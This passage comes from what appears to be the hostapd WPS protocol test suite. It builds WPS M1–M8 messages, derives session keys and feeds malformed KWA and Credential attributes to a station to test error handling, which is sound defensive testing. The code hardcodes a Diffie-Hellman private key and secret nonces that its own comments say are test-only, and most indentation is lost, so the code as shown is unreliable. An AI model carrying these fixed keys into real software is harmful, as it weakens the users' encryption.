decrypted = decrypted[0:len(decrypted) - 12]
m = hmac.new(authkey, decrypted, hashlib.sha256)
calc_kwa = m.digest()[0:8]
if kwa != calc_kwa:
raise Exception("KWA mismatch")
return decrypted
def zeropad_str(val, pad_len):
    return val.zfill(pad_len * 2)
def wsc_dh_init():
# For now, use a hardcoded private key. In theory, this is supposed to be
# randomly selected.
own_private = 0x123456789
own_public = pow(group_5_generator, own_private, group_5_prime)
pk = binascii.unhexlify(zeropad_str(format(own_public, '02x'), 192))
return own_private, pk
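# Validate the peer DH public key and derive the session keys:
# DHKey = SHA-256(g^(AB) mod p) and
# KDK = HMAC-SHA256(DHKey, E-Nonce || Enrollee MAC || R-Nonce).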
def wsc_dh_kdf(peer_pk, own_private, mac_addr, e_nonce, r_nonce):
peer_public = int(binascii.hexlify(peer_pk), 16)
if peer_public < 2 or peer_public >= group_5_prime:
raise Exception("Invalid peer public key")
if pow(peer_public, (group_5_prime - 1) // 2, group_5_prime) != 1:
raise Exception("Unexpected Legendre symbol for peer public key")
shared_secret = pow(peer_public, own_private, group_5_prime)
ss = zeropad_str(format(shared_secret, "02x"), 192)
logger.debug("DH shared secret: " + ss)
dhkey = hashlib.sha256(binascii.unhexlify(ss)).digest()
logger.debug("DHKey: " + binascii.hexlify(dhkey).decode())
m = hmac.new(dhkey, e_nonce + mac_addr + r_nonce, hashlib.sha256)
kdk = m.digest()
logger.debug("KDK: " + binascii.hexlify(kdk).decode())
authkey,keywrapkey,emsk = wsc_keys(kdk)
logger.debug("AuthKey: " + binascii.hexlify(authkey).decode())
logger.debug("KeyWrapKey: " + binascii.hexlify(keywrapkey).decode())
logger.debug("EMSK: " + binascii.hexlify(emsk).decode())
return authkey,keywrapkey
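# Device password proof values, e.g., for the Enrollee:
# E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PK_E || PK_R) and
# E-Hash2 = HMAC-SHA256(AuthKey, E-S2 || PSK2 || PK_E || PK_R).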
def wsc_dev_pw_hash(authkey, dev_pw, e_pk, r_pk):
psk1,psk2 = wsc_dev_pw_psk(authkey, dev_pw)
logger.debug("PSK1: " + binascii.hexlify(psk1).decode())
logger.debug("PSK2: " + binascii.hexlify(psk2).decode())
# Note: Secret values are supposed to be random, but hardcoded values are
# fine for testing.
s1 = 16*b'\x77'
m = hmac.new(authkey, s1 + psk1 + e_pk + r_pk, hashlib.sha256)
hash1 = m.digest()
logger.debug("Hash1: " + binascii.hexlify(hash1).decode())
s2 = 16*b'\x88'
m = hmac.new(authkey, s2 + psk2 + e_pk + r_pk, hashlib.sha256)
hash2 = m.digest()
logger.debug("Hash2: " + binascii.hexlify(hash2).decode())
return s1,s2,hash1,hash2
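# Build M1 with the attributes mandated by the specification; mostly
# zero/empty placeholder values, which is sufficient for these protocol
# tests.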
def build_m1(eap_id, uuid_e, mac_addr, e_nonce, e_pk,
manufacturer='', model_name='', config_methods='\x00\x00'):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M1)
attrs += build_wsc_attr(ATTR_UUID_E, uuid_e)
attrs += build_wsc_attr(ATTR_MAC_ADDR, mac_addr)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_PUBLIC_KEY, e_pk)
attrs += build_wsc_attr(ATTR_AUTH_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_ENCR_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONN_TYPE_FLAGS, '\x00')
attrs += build_wsc_attr(ATTR_CONFIG_METHODS, config_methods)
attrs += build_wsc_attr(ATTR_WPS_STATE, '\x00')
attrs += build_wsc_attr(ATTR_MANUFACTURER, manufacturer)
attrs += build_wsc_attr(ATTR_MODEL_NAME, model_name)
attrs += build_wsc_attr(ATTR_MODEL_NUMBER, '')
attrs += build_wsc_attr(ATTR_SERIAL_NUMBER, '')
attrs += build_wsc_attr(ATTR_PRIMARY_DEV_TYPE, 8*'\x00')
attrs += build_wsc_attr(ATTR_DEV_NAME, '')
attrs += build_wsc_attr(ATTR_RF_BANDS, '\x00')
attrs += build_wsc_attr(ATTR_ASSOC_STATE, '\x00\x00')
attrs += build_wsc_attr(ATTR_DEV_PASSWORD_ID, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, '\x00\x00')
attrs += build_wsc_attr(ATTR_OS_VERSION, '\x00\x00\x00\x00')
m1 = build_eap_wsc(2, eap_id, attrs)
return m1, attrs
def build_m2(authkey, m1, eap_id, e_nonce, r_nonce, uuid_r, r_pk,
dev_pw_id='\x00\x00', eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M2)
if e_nonce:
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if r_nonce:
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_UUID_R, uuid_r)
if r_pk:
attrs += build_wsc_attr(ATTR_PUBLIC_KEY, r_pk)
attrs += build_wsc_attr(ATTR_AUTH_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_ENCR_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONN_TYPE_FLAGS, '\x00')
attrs += build_wsc_attr(ATTR_CONFIG_METHODS, '\x00\x00')
attrs += build_wsc_attr(ATTR_MANUFACTURER, '')
attrs += build_wsc_attr(ATTR_MODEL_NAME, '')
attrs += build_wsc_attr(ATTR_MODEL_NUMBER, '')
attrs += build_wsc_attr(ATTR_SERIAL_NUMBER, '')
attrs += build_wsc_attr(ATTR_PRIMARY_DEV_TYPE, 8*'\x00')
attrs += build_wsc_attr(ATTR_DEV_NAME, '')
attrs += build_wsc_attr(ATTR_RF_BANDS, '\x00')
attrs += build_wsc_attr(ATTR_ASSOC_STATE, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, '\x00\x00')
attrs += build_wsc_attr(ATTR_DEV_PASSWORD_ID, dev_pw_id)
attrs += build_wsc_attr(ATTR_OS_VERSION, '\x00\x00\x00\x00')
attrs += build_attr_authenticator(authkey, m1, attrs)
m2 = build_eap_wsc(eap_code, eap_id, attrs)
return m2, attrs
def build_m2d(m1, eap_id, e_nonce, r_nonce, uuid_r, dev_pw_id=None, eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M2D)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_UUID_R, uuid_r)
attrs += build_wsc_attr(ATTR_AUTH_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_ENCR_TYPE_FLAGS, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONN_TYPE_FLAGS, '\x00')
attrs += build_wsc_attr(ATTR_CONFIG_METHODS, '\x00\x00')
attrs += build_wsc_attr(ATTR_MANUFACTURER, '')
attrs += build_wsc_attr(ATTR_MODEL_NAME, '')
#attrs += build_wsc_attr(ATTR_MODEL_NUMBER, '')
attrs += build_wsc_attr(ATTR_SERIAL_NUMBER, '')
attrs += build_wsc_attr(ATTR_PRIMARY_DEV_TYPE, 8*'\x00')
attrs += build_wsc_attr(ATTR_DEV_NAME, '')
attrs += build_wsc_attr(ATTR_RF_BANDS, '\x00')
attrs += build_wsc_attr(ATTR_ASSOC_STATE, '\x00\x00')
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, '\x00\x00')
attrs += build_wsc_attr(ATTR_OS_VERSION, '\x00\x00\x00\x00')
if dev_pw_id:
attrs += build_wsc_attr(ATTR_DEV_PASSWORD_ID, dev_pw_id)
m2d = build_eap_wsc(eap_code, eap_id, attrs)
return m2d, attrs
def build_ack(eap_id, e_nonce, r_nonce, msg_type=WPS_WSC_ACK, eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
if msg_type is not None:
attrs += build_attr_msg_type(msg_type)
if e_nonce:
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if r_nonce:
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
msg = build_eap_wsc(eap_code, eap_id, attrs, opcode=WSC_ACK)
return msg, attrs
def build_nack(eap_id, e_nonce, r_nonce, config_error='\x00\x00',
msg_type=WPS_WSC_NACK, eap_code=1):
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
if msg_type is not None:
attrs += build_attr_msg_type(msg_type)
if e_nonce:
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if r_nonce:
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
if config_error:
attrs += build_wsc_attr(ATTR_CONFIG_ERROR, config_error)
msg = build_eap_wsc(eap_code, eap_id, attrs, opcode=WSC_NACK)
return msg, attrs
def test_wps_ext(dev, apdev):
"""WPS against external implementation"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
wsc_start_id = msg['eap_identifier']
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
authkey,keywrapkey = wsc_dh_kdf(m2_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, e_nonce,
m2_attrs[ATTR_REGISTRAR_NONCE])
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk,
m2_attrs[ATTR_PUBLIC_KEY])
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
logger.debug("Receive M8 from AP")
msg, m8_attrs, raw_m8_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M8)
m8_cred = decrypt_attr_encr_settings(authkey, keywrapkey,
m8_attrs[ATTR_ENCR_SETTINGS])
logger.debug("M8 Credential: " + binascii.hexlify(m8_cred).decode())
logger.debug("Prepare WSC_Done")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE,
m2_attrs[ATTR_REGISTRAR_NONCE])
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
    # Do not send WSC_Done yet, to allow the exchange with the STA to
    # complete before the AP disconnects.
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
eap_id = wsc_start_id
logger.debug("Send WSC/Start to STA")
wsc_start = build_eap_wsc(1, eap_id, b'', opcode=WSC_Start)
send_wsc_msg(dev[0], bssid, wsc_start)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m5_attrs, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 from STA")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_attr_encr_settings(authkey, keywrapkey, m8_cred)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m8)
eap_id = (eap_id + 1) % 256
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=5)
if ev is None:
raise Exception("wpa_supplicant did not report credential")
logger.debug("Receive WSC_Done from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_Done or msg['wsc_msg_type'] != WPS_WSC_DONE:
raise Exception("Unexpected Op-Code/MsgType for WSC_Done")
logger.debug("Send WSC_Done to AP")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
send_wsc_msg(hapd, addr, wsc_done)
ev = hapd.wait_event(["WPS-REG-SUCCESS"], timeout=5)
if ev is None:
raise Exception("hostapd did not report WPS success")
dev[0].wait_connected()
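# Helpers for the Key Wrap Authenticator (KWA) error cases: run the exchange
# up to the point where M4's Encrypted Settings attribute is about to be
# added, so that each test can construct its own (invalid) variant.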
def wps_start_kwa(dev, apdev):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
return r_s1, keywrapkey, authkey, raw_m3_attrs, eap_id, bssid, attrs
def wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id):
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_kwa_proto_no_kwa(dev, apdev):
"""WPS and KWA error: No KWA attribute"""
r_s1,keywrapkey,authkey,raw_m3_attrs,eap_id,bssid,attrs = wps_start_kwa(dev, apdev)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
# Encrypted Settings without KWA
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id)
def test_wps_ext_kwa_proto_data_after_kwa(dev, apdev):
"""WPS and KWA error: Data after KWA"""
r_s1,keywrapkey,authkey,raw_m3_attrs,eap_id,bssid,attrs = wps_start_kwa(dev, apdev)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
# Encrypted Settings and data after KWA
m = hmac.new(authkey, data, hashlib.sha256)
kwa = m.digest()[0:8]
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, kwa)
data += build_wsc_attr(ATTR_VENDOR_EXT, "1234567890")
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id)
def test_wps_ext_kwa_proto_kwa_mismatch(dev, apdev):
"""WPS and KWA error: KWA mismatch"""
r_s1,keywrapkey,authkey,raw_m3_attrs,eap_id,bssid,attrs = wps_start_kwa(dev, apdev)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
# Encrypted Settings and KWA with incorrect value
data += build_wsc_attr(ATTR_KEY_WRAP_AUTH, 8*'\x00')
iv = 16*b'\x99'
aes = AES.new(keywrapkey, AES.MODE_CBC, iv)
pad_len = 16 - len(data) % 16
ps = pad_len * struct.pack('B', pad_len)
data += ps
wrapped = aes.encrypt(data)
attrs += build_wsc_attr(ATTR_ENCR_SETTINGS, iv + wrapped)
wps_stop_kwa(dev, bssid, attrs, authkey, raw_m3_attrs, eap_id)
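# Run the external Registrar side of the exchange through M8 with the given
# Credential and verify how the STA reacts: connect, complete without
# connecting, or NACK the credential.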
def wps_run_cred_proto(dev, apdev, m8_cred, connect=False, no_connect=False):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, e_pk = wsc_dh_init()
logger.debug("Receive M1 from STA")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M1)
eap_id = (msg['eap_identifier'] + 1) % 256
authkey,keywrapkey = wsc_dh_kdf(m1_attrs[ATTR_PUBLIC_KEY], own_private,
mac_addr, m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, pin,
m1_attrs[ATTR_PUBLIC_KEY], e_pk)
logger.debug("Send M2 to STA")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, eap_id,
m1_attrs[ATTR_ENROLLEE_NONCE],
r_nonce, uuid_r, e_pk)
send_wsc_msg(dev[0], bssid, m2)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M3 from STA")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M3)
logger.debug("Send M4 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 from STA")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M5)
logger.debug("Send M6 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m5_attrs, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 from STA")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE,
m1_attrs[ATTR_ENROLLEE_NONCE])
attrs += build_attr_encr_settings(authkey, keywrapkey, m8_cred)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m8)
eap_id = (eap_id + 1) % 256
if no_connect:
logger.debug("Receive WSC_Done from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_Done or msg['wsc_msg_type'] != WPS_WSC_DONE:
raise Exception("Unexpected Op-Code/MsgType for WSC_Done")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
elif connect:
logger.debug("Receive WSC_Done from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_Done or msg['wsc_msg_type'] != WPS_WSC_DONE:
raise Exception("Unexpected Op-Code/MsgType for WSC_Done")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_connected()
else:
# Verify STA NACK's the credential
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
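# Build a Credential attribute; any field can be omitted by passing None to
# exercise the corresponding error path on the STA.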
def build_cred(nw_idx='\x01', ssid='test-wps-conf', auth_type='\x00\x20',
encr_type='\x00\x08', nw_key="12345678",
mac_addr='\x00\x00\x00\x00\x00\x00'):
attrs = b''
if nw_idx is not None:
attrs += build_wsc_attr(ATTR_NETWORK_INDEX, nw_idx)
if ssid is not None:
attrs += build_wsc_attr(ATTR_SSID, ssid)
if auth_type is not None:
attrs += build_wsc_attr(ATTR_AUTH_TYPE, auth_type)
if encr_type is not None:
attrs += build_wsc_attr(ATTR_ENCR_TYPE, encr_type)
if nw_key is not None:
attrs += build_wsc_attr(ATTR_NETWORK_KEY, nw_key)
if mac_addr is not None:
attrs += build_wsc_attr(ATTR_MAC_ADDR, mac_addr)
return build_wsc_attr(ATTR_CRED, attrs)
def test_wps_ext_cred_proto_success(dev, apdev):
"""WPS and Credential: success"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr)
wps_run_cred_proto(dev, apdev, m8_cred, connect=True)
def test_wps_ext_cred_proto_mac_addr_mismatch(dev, apdev):
"""WPS and Credential: MAC Address mismatch"""
m8_cred = build_cred()
wps_run_cred_proto(dev, apdev, m8_cred, connect=True)
def test_wps_ext_cred_proto_zero_padding(dev, apdev):
"""WPS and Credential: zeropadded attributes"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, ssid='test-wps-conf\x00',
nw_key="12345678\x00")
wps_run_cred_proto(dev, apdev, m8_cred, connect=True)
def test_wps_ext_cred_proto_ssid_missing(dev, apdev):
"""WPS and Credential: SSID missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, ssid=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_ssid_zero_len(dev, apdev):
"""WPS and Credential: Zero-length SSID"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, ssid="")
wps_run_cred_proto(dev, apdev, m8_cred, no_connect=True)
def test_wps_ext_cred_proto_auth_type_missing(dev, apdev):
"""WPS and Credential: Auth Type missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, auth_type=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_encr_type_missing(dev, apdev):
"""WPS and Credential: Encr Type missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, encr_type=None)
wps_run_cred_proto(dev, apdev, m8_cred)
def test_wps_ext_cred_proto_network_key_missing(dev, apdev):
"""WPS and Credential: Network Key missing"""
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
m8_cred = build_cred(mac_addr=mac_addr, nw_key=None)
wps_run_cred_proto(dev, apdev, m8_cred)
